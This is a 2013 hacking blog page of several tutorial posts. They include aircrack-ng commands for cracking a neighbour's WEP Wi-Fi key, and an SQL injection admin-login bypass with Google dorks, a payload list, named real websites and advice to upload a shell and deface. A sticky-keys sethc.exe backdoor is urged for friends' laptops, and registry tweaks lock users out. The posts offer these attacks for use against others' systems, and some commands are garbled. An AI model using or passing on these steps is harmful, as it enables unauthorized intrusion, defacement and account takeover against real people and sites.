Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, 3 April 2013

HOW TO USE WEBSPLOIT?

07:20 By No comments



Restricting Users from using Log off button

This trick can be used to restrict users from logging off the computer.
Follow the steps described below-
1. Launch Windows Registry Editor (regedit.exe)
2. Search the following key-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\
3. In the right pane create a new DWORD value named StartMenuLogOff.
4. Change its value to 1 to put restriction on logging off the computer whereas data value 0 can be used to remove the restrictions.




Preventing Users from using Right Click Button on Desktop

This is one of the most frustrating prank for the person on whom you are playing this trick and I mean it because I have been the victim of this trick earlier when I was new to Windows Registry Hacking and didn'tt knew much more about it.
Follow the steps given below to perform the trick-

1. Open Windows Registry Editor (Regedit.exe)
2. Navigate to the following key-

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer\
3. Create a new DWORD value named NoWinKeys.
4. Change its data value to 1 to disable right click whereas data value 0 will enable the right click.



Create your own Sleep button in Windows XP.

If you are a lazy kind of a person (just like me) and you think the Sleep button on your Windows XP machine in an inconvenient location for regular use? If you think yes follow the steps below to make your own.
Now a Days, Many computers or keyboards have a  Sleep button, which when pressed puts the computer
into either Stand By or Hibernate mode depending on how Windows XP’s Power Options are
configured. However, the Sleep button might not be in convenient location for regular use. For example, it might be on the front of a mid-tower
case that’s under your desk. You could activate Stand By or Hibernate mode from the Shut Down Windows dialog box. An alternative to this
method is to create your own Sleep button by creating a shortcut on your
desktop. Here’s how.
1. Right-click on the desktop.
2. Select New | Shortcut.
3. Type rundll32.exe powrprof.dll,SetSuspendState in the text box.
4. Click Next.
5. Type Sleep in the text box and click Finish.
Now when you click the Sleep icon, Windows XP will put the computer into either Stand By
or Hibernate mode depending on how the When I Press The Sleep Button On My Computer
setting is configured on the Advanced tab of the Power Options Properties dialog box.

Read more →

How to Learn Hacking - The Most Asked Question

07:04 By No comments



How to learn hacking??? This is the most asked question in the mails i receive and also in the web... Actually, this is not that easy to answer because i know what it takes. Most often people think that learning hacking means to hack in to someones computer with/without their knowledge and steel stuff. But in reality that's not what hacking is all about.
Actually, I think this is going to be pretty long post so please be bare with me.


What Is Hacking???

From a long time there is a misconception like saying that hacking means steeling stuff and hackers are ruthless thieves and mad mindless fellows(of-course, intelligent :) ), thanks to media.
But in actual sense hacking means respecting freedom, respecting your fellow people, exploring, enthusiasm,  dare to be new, dare to try new, make things work the way we want, ability to deal with, inspiration, curiosity, dedication, patience, problem solving.
See, this is what hacking is.

Is Hacking Fancy???

If you think so... Just snap out of it because, in reality sometimes(mostly) its like working in dark mine with a dim head light and sometimes its like the time we enjoy our time in beach or in a dog park.
If you are the one who got inspired by movies like Die Hard 4.0, Sword Fish etc.., where hackers are real fancy and doing stuff just like a piece of cake then its time to get in to reality.

Things To Do Before Starting

As i said before, this is not that easy to answer because it depends form person to person and the way he/she approaches. So, here i'm sharing my way of approach and how i became CEH[Certified Ethical Hacker].

Even before thinking about 'How to Learn Hacking' be ready for a long, dedicated drive which includes lots and lots of patience.

## First of all, this is not any spoon feeding tutorial. so if you are here for that then this is a bad place for you and i'm not going in to much detail as i think you are good at grasping things.

## So now you are ready, Before going in to big thing like hacking, evaluate yourself.... know how much do you know about computers, operating systems, networking, hardware stuff, problem solving ability etc..., drill down in to basics, as basics are the foundation and if you are not good at basics, you are not good at nothing.

## To start, get a good grip of operating systems and how they work. To improve your knowledge try different types of operating sytems like windows, or linux distros like ubuntu, Fedora, Linux Mint, Arch Linux, etc. I suggest that you start using linux distros because they are fun and they'll make you do things and will also bend as you want.
If you are an absolute beginner in using linux distros then my suggestion is that you start with some easy linux distros like Ubuntu or Puppy linux.

## The next thing you need to be good is networking basics like routers, switches, topologies  models, TCP/IP, other protocols, etc..,

## Get familiar with the computer terminology because you don't want to panic when you see some thing like 'foot printing or Cryptography' ;)

## Go learn your favorite programming language, If you are an absolute beginner who have no intraction with coding then better start with HTML & CSS(actually these are not programming languages) because these are a better way to introduce you to the coding world. If you have some knowledge of programming languages and don't know where to start then my suggestion would be to go with Python Programming language which is pretty easy and user friendly(Again its up to you to what to choose to learn).

## The other most important basic thing you need to learn is to be calm and patient. Last but not least is not to complain too much about things as the more you complain the more you loose the ability to solve the problem, concentration and pace.

Sources to Learn Basics
If you are the who can self though then you can  go for online tutorials, reading PDF's about the basics, participating in forums, sharing what you know or even having some video classes.
If you are an absolute beginner, I recommend you to have interactive video classes because they help you shape and the other thing is that we can learn quickly this way than by reading lots of PDFs.
When it comes to video classes there are lots of free sites which offer you free video classes but most of them are not qualitative, updated and are not in specific order. So, if you don't mind some bucks then go for premium video classes from CBT Nuggets or Lynda.

If you think you need assistance then you can go join some institutions near by you to learn basics which will really help you to learn and to deal with the problems in real life.

How to Learn Hacking???

Now here we are, When ever you are good at the basics you will have a clear view of what and how to do the things. Actually from here the journey will be pretty happy and safe.
There are lots of reputed institutions like InnobuzzECouncilInfosec Institute, etc. These institutes here provide you classes in-person or you can apply for distance learning. The thing with this institutes is that they provide you with the hacking environment, tools, knowledge and also assistance.

By the way there are lots of Ebooks which teach you how to hack, how to pen test, etc.., So its up to you to choose the way to learn. But all i'm saying is that never back down on basics and you should never have a doubt when it comes to basics.

Final Words

If you are good at the basic level you are half way through and you can achieve almost anything. Just concentrate only of one task at a time like, while you are learning networking just do that, don't peek in to programming languages as this my dilute you concentration - end result - only half knowledge.
As per some old saying 'Half knowledge is worse than no knowledge'. Finally what i say is..... Explore, Learn, Share & Gain.

Read more →

HOW TO CRACK WI-FI PASSWORD IN UBUNTU?

07:03 By , No comments



For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s
(1)install aircrack
sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “su –“ and type your password.

(3)now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code:
# airodump-ng wlan0

(5)Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.
Code:
# airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0

(6)Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.
Code:
# aireplay-ng -3 –b 00:15:EB:E7: … wlan0

(7)Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
Code:
# aircrack-ng wep-03.cap

Then you should see that the key has been decrypted 100% successfully and the key itself.

Read more →

Over 3000 Hacking tutorials for free

07:01 By , , No comments

Hacking Tutorials

Many of us are very curious about learning hacking and all about computers, along with that we all know that we should need a good start to get the elite stage the hacking game. So from my side I'm giving you a small of more than 3000 hacking tutorials which are best of 2008, 2009, 2010.
Some of this tutorials may be old and they may not work with today's systems but you have to learn one thing that is "old is always gold" besides knowing "HOW TO" costs you nothing. So download them for free and Happy hacking.



Download Links:

Read more →

HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION

06:57 By , 2 comments



You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Read more →

Hack Windows 7 Login Password without any Software

06:52 By , , No comments




 

Lets say that you have just cracked victim's windows password.  or you got access to his windows for some time.Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?
Yes we can :) .
Backdoor actually means maintaining access for future use.
Lets Start!!
Open your command prompt (run as administrator in win 7/vista).


Type the following command :
Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.


Hopefully your new password must have been set. did you notice one thing ? It didn't ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.  
Okay lets move on.
Now press shift key five times and you must have got a dialog box "sticky keys" on screen.




Sticky keys is a feature that makes it easy for users who have physical  disablilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at  logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed inC:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file

sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
 
But you just cant simply rename it or change system32 files. Follow the tutorial for that.


 Tutorial :


* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.



@ Windows XP Users
Hopefully existing orignal sethc.exe must have been replaced and your job is done. Now press shift five times and you would see command prompt on screen.You can access command prompt at windows logon screen and change/clear the password easily using "net user" command.



Note: You can also do these changes while using windows Guest Account. But when you would access command prompt at logon screen, you can change/clear password even of administrator's account. This is exactly how , we can hack into administrator's account through guest account.
 


@ Windows vista/7 Users
You must have got a pop up box saying "Access Denied".








Actually you can not change system32 directory files until you do not have the permissions. You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator.  Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.



2. Then click on 'Edit' in security tab to edit permissions. Click on 'Administrators' , give it full control
and apply changes.

Okay its done now.

Now try replacing the orignal sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Enjoy Command prompt at logon screen...

So do not forget to set this backdoor whenever you would get friend's  laptop for a few minutes... :)

Read more →